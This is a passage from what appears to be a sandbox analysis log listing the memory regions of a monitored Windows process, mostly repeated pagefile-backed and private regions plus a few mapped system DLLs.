entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6231 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6232 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6233 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6234 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6235 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6236 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6237 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6238 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6239 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6240 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6241 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6242 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6243 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6244 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6245 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6246 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6247 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6248 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6249 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6250 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6251 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6252 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6253 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6254 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6255 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6256 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6257 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6258 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6259 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6260 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6261 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6262 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6263 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6264 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6265 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6266 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6267 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6268 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6269 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6270 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6271 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6272 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6273 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6274 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6275 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6276 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6277 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6278 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6279 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6280 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6281 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6282 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6283 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6284 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6285 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6286 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6287 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6288 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6289 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6290 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6291 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6292 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6293 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6294 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6295 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6296 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6297 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6298 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6299 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6300 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6301 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6302 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6303 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6304 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6305 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6306 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6307 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6308 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6309 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6310 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6311 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6312 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6313 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6314 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6315 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6316 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6317 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6318 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6319 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6320 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6321 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6322 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6323 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6324 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6325 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6326 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6327 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6328 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6329 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6330 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6331 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6332 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6333 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6334 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6335 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6336 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6337 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6338 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6339 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6340 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6341 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6342 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6343 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6344 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6345 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6346 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6347 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6348 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6349 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6350 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6351 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6352 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6353 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6354 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6355 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6356 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6357 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6358 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6359 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6360 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6361 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6362 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6363 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6364 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6365 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6366 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6367 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6368 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6369 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6370 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6371 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6372 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6373 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6374 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6375 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6376 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6377 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6378 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6379 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6380 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6381 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6382 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6383 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6384 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6385 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6386 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6387 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6388 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6389 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6390 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6391 start_va = 0x540000 end_va = 0x543fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 6392 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6393 start_va = 0x26c0000 end_va = 0x26e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 6394 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6395 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6396 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6397 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6398 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6399 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6400 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6401 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6402 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6403 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6404 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6405 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6406 start_va = 0x7ffb114c0000 end_va = 0x7ffb11573fff monitored = 0 entry_point = 0x7ffb114d53b0 region_type = mapped_file name = "windows.internal.shell.broker.dll" filename = "\\Windows\\System32\\Windows.Internal.Shell.Broker.dll" (normalized: "c:\\windows\\system32\\windows.internal.shell.broker.dll") Region: id = 6407 start_va = 0x10d70000 end_va = 0x10deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010d70000" filename = "" Region: id = 6408 start_va = 0x7ff60e360000 end_va = 0x7ff60eb2bfff monitored = 0 entry_point = 0x7ff60e6f9010 region_type = mapped_file name = "ntoskrnl.exe" filename = "\\Windows\\System32\\ntoskrnl.exe" (normalized: "c:\\windows\\system32\\ntoskrnl.exe") Region: id = 6409 start_va = 0x7ffb0a780000 end_va = 0x7ffb0a822fff monitored = 0 entry_point = 0x7ffb0a794810 region_type = mapped_file name = "wpnapps.dll" filename = "\\Windows\\System32\\wpnapps.dll" (normalized: "c:\\windows\\system32\\wpnapps.dll") Region: id = 6410 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 6411 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6412 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6413 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6414 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6415 start_va = 0x7ffb16bf0000 end_va = 0x7ffb16e69fff monitored = 0 entry_point = 0x7ffb16c0a7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 6416 start_va = 0x8c20000 end_va = 0x8daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c20000" filename = "" Region: id = 6417 start_va = 0x570000 end_va = 0x570fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = 